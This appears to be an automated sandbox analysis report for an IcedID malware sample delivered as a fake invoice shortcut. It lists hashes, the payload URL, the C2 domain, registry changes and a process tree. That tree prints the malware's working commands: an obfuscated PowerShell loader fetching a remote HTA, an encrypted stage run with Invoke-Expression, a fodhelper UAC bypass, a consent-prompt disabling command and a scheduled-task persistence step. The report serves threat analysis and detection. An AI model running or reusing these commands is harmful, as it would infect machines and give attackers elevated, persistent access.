Resubmissions
25-05-2022 19:16
220525-xy9rdacee9 1023-05-2022 22:23
220523-2bae8ahfb7 1023-05-2022 22:09
220523-12vneahef3 10Analysis
-
max time kernel
1558s -
max time network
1598s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
25-05-2022 19:16
Static task
static1
Behavioral task
behavioral1
Sample
Invoice_1.lnk
Resource
win7-20220414-en
General
-
Target
Invoice_1.lnk
-
Size
2KB
-
MD5
c00c67f3de031c5ae198ba0362b5dd01
-
SHA1
40f3b0263f8fccdf1fd5fe287dbd55829a8eddd6
-
SHA256
d146c8bc52ec74b67704b30c0fb20995ba65770d191502f70c88c262dc44fc5d
-
SHA512
4944aa5947667500eddb4d7fed5b0a8eb4d14db1d60496fcbe38c4032511b04c92757807a23dff49353f5ee75a5ed44cc5de9ed7cdcd12b59a7b8c9214e227ad
Malware Config
Extracted
https://conderadio.tv/09872574.hta
Extracted
icedid
109932505
ilekvoyn.com
Signatures
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exepowershell.exeRundll32.exeflow pid process 7 3632 mshta.exe 12 3632 mshta.exe 23 4340 powershell.exe 33 4384 Rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 1 IoCs
Processes:
Rundll32.exepid process 4384 Rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 11 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ZDqcC.bat" powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kywdT.bat" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute powershell.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings powershell.exe -
Processes:
mshta.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 mshta.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeRundll32.exepid process 2648 powershell.exe 2648 powershell.exe 4340 powershell.exe 4340 powershell.exe 1200 powershell.exe 1200 powershell.exe 2672 powershell.exe 2672 powershell.exe 4384 Rundll32.exe 4384 Rundll32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2648 powershell.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 2672 powershell.exe Token: SeIncreaseQuotaPrivilege 2672 powershell.exe Token: SeSecurityPrivilege 2672 powershell.exe Token: SeTakeOwnershipPrivilege 2672 powershell.exe Token: SeLoadDriverPrivilege 2672 powershell.exe Token: SeSystemProfilePrivilege 2672 powershell.exe Token: SeSystemtimePrivilege 2672 powershell.exe Token: SeProfSingleProcessPrivilege 2672 powershell.exe Token: SeIncBasePriorityPrivilege 2672 powershell.exe Token: SeCreatePagefilePrivilege 2672 powershell.exe Token: SeBackupPrivilege 2672 powershell.exe Token: SeRestorePrivilege 2672 powershell.exe Token: SeShutdownPrivilege 2672 powershell.exe Token: SeDebugPrivilege 2672 powershell.exe Token: SeSystemEnvironmentPrivilege 2672 powershell.exe Token: SeRemoteShutdownPrivilege 2672 powershell.exe Token: SeUndockPrivilege 2672 powershell.exe Token: SeManageVolumePrivilege 2672 powershell.exe Token: 33 2672 powershell.exe Token: 34 2672 powershell.exe Token: 35 2672 powershell.exe Token: 36 2672 powershell.exe Token: SeIncreaseQuotaPrivilege 2672 powershell.exe Token: SeSecurityPrivilege 2672 powershell.exe Token: SeTakeOwnershipPrivilege 2672 powershell.exe Token: SeLoadDriverPrivilege 2672 powershell.exe Token: SeSystemProfilePrivilege 2672 powershell.exe Token: SeSystemtimePrivilege 2672 powershell.exe Token: SeProfSingleProcessPrivilege 2672 powershell.exe Token: SeIncBasePriorityPrivilege 2672 powershell.exe Token: SeCreatePagefilePrivilege 2672 powershell.exe Token: SeBackupPrivilege 2672 powershell.exe Token: SeRestorePrivilege 2672 powershell.exe Token: SeShutdownPrivilege 2672 powershell.exe Token: SeDebugPrivilege 2672 powershell.exe Token: SeSystemEnvironmentPrivilege 2672 powershell.exe Token: SeRemoteShutdownPrivilege 2672 powershell.exe Token: SeUndockPrivilege 2672 powershell.exe Token: SeManageVolumePrivilege 2672 powershell.exe Token: 33 2672 powershell.exe Token: 34 2672 powershell.exe Token: 35 2672 powershell.exe Token: 36 2672 powershell.exe Token: SeIncreaseQuotaPrivilege 2672 powershell.exe Token: SeSecurityPrivilege 2672 powershell.exe Token: SeTakeOwnershipPrivilege 2672 powershell.exe Token: SeLoadDriverPrivilege 2672 powershell.exe Token: SeSystemProfilePrivilege 2672 powershell.exe Token: SeSystemtimePrivilege 2672 powershell.exe Token: SeProfSingleProcessPrivilege 2672 powershell.exe Token: SeIncBasePriorityPrivilege 2672 powershell.exe Token: SeCreatePagefilePrivilege 2672 powershell.exe Token: SeBackupPrivilege 2672 powershell.exe Token: SeRestorePrivilege 2672 powershell.exe Token: SeShutdownPrivilege 2672 powershell.exe Token: SeDebugPrivilege 2672 powershell.exe Token: SeSystemEnvironmentPrivilege 2672 powershell.exe Token: SeRemoteShutdownPrivilege 2672 powershell.exe Token: SeUndockPrivilege 2672 powershell.exe Token: SeManageVolumePrivilege 2672 powershell.exe Token: 33 2672 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Rundll32.exepid process 4384 Rundll32.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
cmd.exepowershell.exemshta.exepowershell.exefodhelper.execmd.execmd.exefodhelper.execmd.execmd.exedescription pid process target process PID 1792 wrote to memory of 2648 1792 cmd.exe powershell.exe PID 1792 wrote to memory of 2648 1792 cmd.exe powershell.exe PID 2648 wrote to memory of 3632 2648 powershell.exe mshta.exe PID 2648 wrote to memory of 3632 2648 powershell.exe mshta.exe PID 3632 wrote to memory of 4340 3632 mshta.exe powershell.exe PID 3632 wrote to memory of 4340 3632 mshta.exe powershell.exe PID 4340 wrote to memory of 4480 4340 powershell.exe fodhelper.exe PID 4340 wrote to memory of 4480 4340 powershell.exe fodhelper.exe PID 4480 wrote to memory of 4980 4480 fodhelper.exe cmd.exe PID 4480 wrote to memory of 4980 4480 fodhelper.exe cmd.exe PID 4980 wrote to memory of 2580 4980 cmd.exe cmd.exe PID 4980 wrote to memory of 2580 4980 cmd.exe cmd.exe PID 2580 wrote to memory of 1200 2580 cmd.exe powershell.exe PID 2580 wrote to memory of 1200 2580 cmd.exe powershell.exe PID 2580 wrote to memory of 3908 2580 cmd.exe cmd.exe PID 2580 wrote to memory of 3908 2580 cmd.exe cmd.exe PID 4340 wrote to memory of 1348 4340 powershell.exe fodhelper.exe PID 4340 wrote to memory of 1348 4340 powershell.exe fodhelper.exe PID 1348 wrote to memory of 2496 1348 fodhelper.exe cmd.exe PID 1348 wrote to memory of 2496 1348 fodhelper.exe cmd.exe PID 2496 wrote to memory of 3860 2496 cmd.exe cmd.exe PID 2496 wrote to memory of 3860 2496 cmd.exe cmd.exe PID 3860 wrote to memory of 2672 3860 cmd.exe powershell.exe PID 3860 wrote to memory of 2672 3860 cmd.exe powershell.exe PID 3860 wrote to memory of 1392 3860 cmd.exe cmd.exe PID 3860 wrote to memory of 1392 3860 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Invoice_1.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#oeE'}tV41O#>$zfkmQNMMGKcDTdJr=@(30802,30808,30797,30809,30790,30725,30797,30809,30809,30805,30808,30751,30740,30740,30792,30804,30803,30793,30794,30807,30790,30793,30798,30804,30739,30809,30811,30740,30741,30750,30749,30748,30743,30746,30748,30745,30739,30797,30809,30790);<#oeE'}tV41O#>$JxXPDMbtIHLsflxCnW=@(30766,30762,30781);<#oeE'}tV41O#>function najjGYpeT($gNCFLP){$KeafQvWRzpQ=30693;<#oeE'}tV41O#>$GDaRsn=$Null;foreach($jimJcuhW in $gNCFLP){$GDaRsn+=[char]($jimJcuhW-$KeafQvWRzpQ)};return $GDaRsn};sal pQtoDlBENz (najjGYpeT $JxXPDMbtIHLsflxCnW);<#oeE'}tV41O#>pQtoDlBENz((najjGYpeT $zfkmQNMMGKcDTdJr));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://conderadio.tv/09872574.hta3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ekPb = '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';$tPFOxUIgHD = 'U3FHZEtYZHBWcHZaQ09TR1JSell1ZmhUWktOemhReEc=';$CBMKxSfhg = New-Object 'System.Security.Cryptography.AesManaged';$CBMKxSfhg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CBMKxSfhg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CBMKxSfhg.BlockSize = 128;$CBMKxSfhg.KeySize = 256;$CBMKxSfhg.Key = [System.Convert]::FromBase64String($tPFOxUIgHD);$ddnEW = [System.Convert]::FromBase64String($ekPb);$kAbSPqMWQ = $ddnEW[0..15];$CBMKxSfhg.IV = $kAbSPqMWQ;$AUXAiVjEXOpkNt = $CBMKxSfhg.CreateDecryptor();$XPnBMtsJXxDfbSw = $AUXAiVjEXOpkNt.TransformFinalBlock($ddnEW, 16, $ddnEW.Length - 16);$CBMKxSfhg.Dispose();$GDDbozdXrwaw = New-Object System.IO.MemoryStream( , $XPnBMtsJXxDfbSw );$DuRHh = New-Object System.IO.MemoryStream;$qYlxsgnfBTqatvQswW = New-Object System.IO.Compression.GzipStream $GDDbozdXrwaw, ([IO.Compression.CompressionMode]::Decompress);$qYlxsgnfBTqatvQswW.CopyTo( $DuRHh );$qYlxsgnfBTqatvQswW.Close();$GDDbozdXrwaw.Close();[byte[]] $qDmVNkk = $DuRHh.ToArray();$liVTzN = [System.Text.Encoding]::UTF8.GetString($qDmVNkk);Invoke-Expression($liVTzN)4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" *7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 08⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c del "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat"8⤵
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kywdT.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\kywdT.bat" *7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe function tXIPlkvsktLPL ($hyUQNAjDGWycUo){ $mXzmkJZcEjqHY = 'Core update check'; $MAVXCzBKIjuPJeFnAJ = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ' C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer'); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $mXzmkJZcEjqHY; Description = 'Core updating process.'; TaskPath = 'UpdateCheck'; RunLevel = 'Highest'}; Register-ScheduledTask @MAVXCzBKIjuPJeFnAJ -Force}; tXIPlkvsktLPL C:\Users\Admin\AppData\Local\Temp\1.dll8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c del "C:\Users\Admin\AppData\Local\Temp\kywdT.bat"8⤵
-
C:\Windows\system32\Rundll32.exeRundll32.exe C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58b591dabf3d165412ca5160b0fc9f7a0
SHA17f4003f64d280a98099a799b7303ab94adfea747
SHA256d90968baa89063686e83e4514b0b0341f703aefec3e00f63020a344763e92f60
SHA51257aaed079e38c08f0fe05aec21c02c84a7ed80780e796a5944227d5f17439a1b4378004931512965445826457f30488ec8f173b199e0e5374d4828c43a7e8af5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5331841fe482ffe8b1cc1509733d8ca67
SHA11e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8
SHA25614112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f
SHA512039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5331841fe482ffe8b1cc1509733d8ca67
SHA11e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8
SHA25614112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f
SHA512039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9
-
C:\Users\Admin\AppData\Local\Temp\1.dllFilesize
718KB
MD55a0e570b13623c79c9261a8a2cc41f04
SHA110f6f208907d25f5ec39060a8576ed8387d42c0e
SHA2563dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109
SHA512bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70
-
C:\Users\Admin\AppData\Local\Temp\1.dllFilesize
718KB
MD55a0e570b13623c79c9261a8a2cc41f04
SHA110f6f208907d25f5ec39060a8576ed8387d42c0e
SHA2563dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109
SHA512bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70
-
C:\Users\Admin\AppData\Local\Temp\ZDqcC.batFilesize
343B
MD58ca0985471c9c17826fab97b90f90c2e
SHA16dfd1040096a2215be242e4392d7a2768d067f10
SHA256f9a6e829c29a8411f88db8a26edc1fafe70c64b0df651ad359ca944b14a17781
SHA512539d65d7e7676e3a030de37e1339c2ddb0077db3242d42e6497c66f1bc8f9fc60a00150d8c29ade40c6845e1733f4f2d4cb9f830d09969676f1d24834767cefb
-
C:\Users\Admin\AppData\Local\Temp\kywdT.batFilesize
692B
MD5a9338ee7f2e9643871e016eda0ecbe1f
SHA166c6dc3bcd948645774778263e7c8069e340e704
SHA256c3eecc22513eb86b258dc0bfe97a599c9c5673d86fb2d2b286a88d113f076813
SHA5127cb76b9cfdb41e3640bbec245324ba4c05757c84d0dec7d36320ce6836a2a7868727a7add4b0b49e9126f6b3233d18c2e31649ef4015769248f6101211f4853f
-
memory/1200-143-0x0000000000000000-mapping.dmp
-
memory/1200-144-0x00007FFE0EA20000-0x00007FFE0F4E1000-memory.dmpFilesize
10.8MB
-
memory/1348-146-0x0000000000000000-mapping.dmp
-
memory/1392-154-0x0000000000000000-mapping.dmp
-
memory/2496-147-0x0000000000000000-mapping.dmp
-
memory/2580-142-0x0000000000000000-mapping.dmp
-
memory/2648-134-0x00007FFE0F180000-0x00007FFE0FC41000-memory.dmpFilesize
10.8MB
-
memory/2648-130-0x0000000000000000-mapping.dmp
-
memory/2648-131-0x0000022D7F520000-0x0000022D7F542000-memory.dmpFilesize
136KB
-
memory/2672-150-0x0000000000000000-mapping.dmp
-
memory/2672-153-0x00007FFE0EA20000-0x00007FFE0F4E1000-memory.dmpFilesize
10.8MB
-
memory/3632-132-0x0000000000000000-mapping.dmp
-
memory/3860-149-0x0000000000000000-mapping.dmp
-
memory/3908-145-0x0000000000000000-mapping.dmp
-
memory/4340-138-0x00007FFE0EA20000-0x00007FFE0F4E1000-memory.dmpFilesize
10.8MB
-
memory/4340-135-0x0000000000000000-mapping.dmp
-
memory/4384-157-0x0000000180000000-0x0000000180009000-memory.dmpFilesize
36KB
-
memory/4480-139-0x0000000000000000-mapping.dmp
-
memory/4980-140-0x0000000000000000-mapping.dmp